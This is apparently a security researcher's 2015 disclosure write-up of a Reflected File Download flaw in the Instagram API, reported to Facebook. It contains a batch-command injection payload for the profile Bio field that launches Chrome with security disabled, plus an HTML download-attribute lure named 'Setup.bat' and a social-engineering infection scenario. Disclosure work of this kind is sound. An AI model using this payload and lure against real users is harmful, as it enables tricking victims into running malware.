Instagram Reflected Filename Download

WS201508 – Instagram Reflected Filename Download
by David Sopas @dsopas


So far I haven’t been so successful sending this type of vulnerability to Facebook but I’ll keep trying to show that this type of security issues is to be taken more seriously.

This time I found a RFD on Instagram API. No need to add any command on the URL because we will use a persistent reflected field to do that. Like “Bio” field on the user account.

What we need? A token. No worries we just need to register a new user to get one.

Next step: Insert the batch command we want to use in the user account Bio field [and maybe others]. I’ll try to open a Chrome new window with a malicious page disabling most the protections from this browser:

“||start chrome –disable-web-security –disable-popup-blocking||

Keep in mind that in this proof-of-concept the page is not malicious. It’s only clear text.

So now when you visit Instagram JSON file from this created user we’ll see:

{“meta”:{“code”:200},”data”:{“username”:”davidsopas”,”bio”:”\”||start chrome\/malware.htm –disable-web-security –disable-popup-blocking||”,”website”:”http:\/\/”,”profile_picture”:”https:\/\/\/hphotos-ak-xaf1\/t51.2885-19\/11055505_1374264689564237_952365304_a.jpg”,”full_name”:”David Sopas”,”counts”:{“media”:0,”followed_by”:11,”follows”:3},”id”:”1750545056″}}

So the Reflected part is done. Now we need the Filename section. Due to filename restritions on the Instagram path we need to use HTML5 attribute to do this. Due to this situation “only” the following browsers are supported:

  • Chrome
  • Opera
  • Android Browser
  • Chrome for Android
  • Firefox [forcing the user to “Save Link As”]

A user can replicate this by having this HTML code:

<a href="" download="Setup.bat" onclick="return false;">Install Instagram new Photo Effects</a>

What this will do is when the user click on the download link will get a file supposed to be on [a trusted domain] gaining credibility from the victim.

So a possible attack scenario will be:

  1. Malicious user posts a new message to all his Instagram friends linking to a specially crafted page
  2. Victims clicks on the link and checks that the file is store on Instagram servers and runs it
  3. Victim has been infected with malware

You can check my PoC video:

I deleted my test account so the access_token provided above is not valid.
I provide Facebook a quick fix but for them is not a priority to fix this security issue – so is still open.


15 Mar 2015 – Reported to Facebook
24 Mar 2015 – Full disclosure

Achaste interessante? Partilha!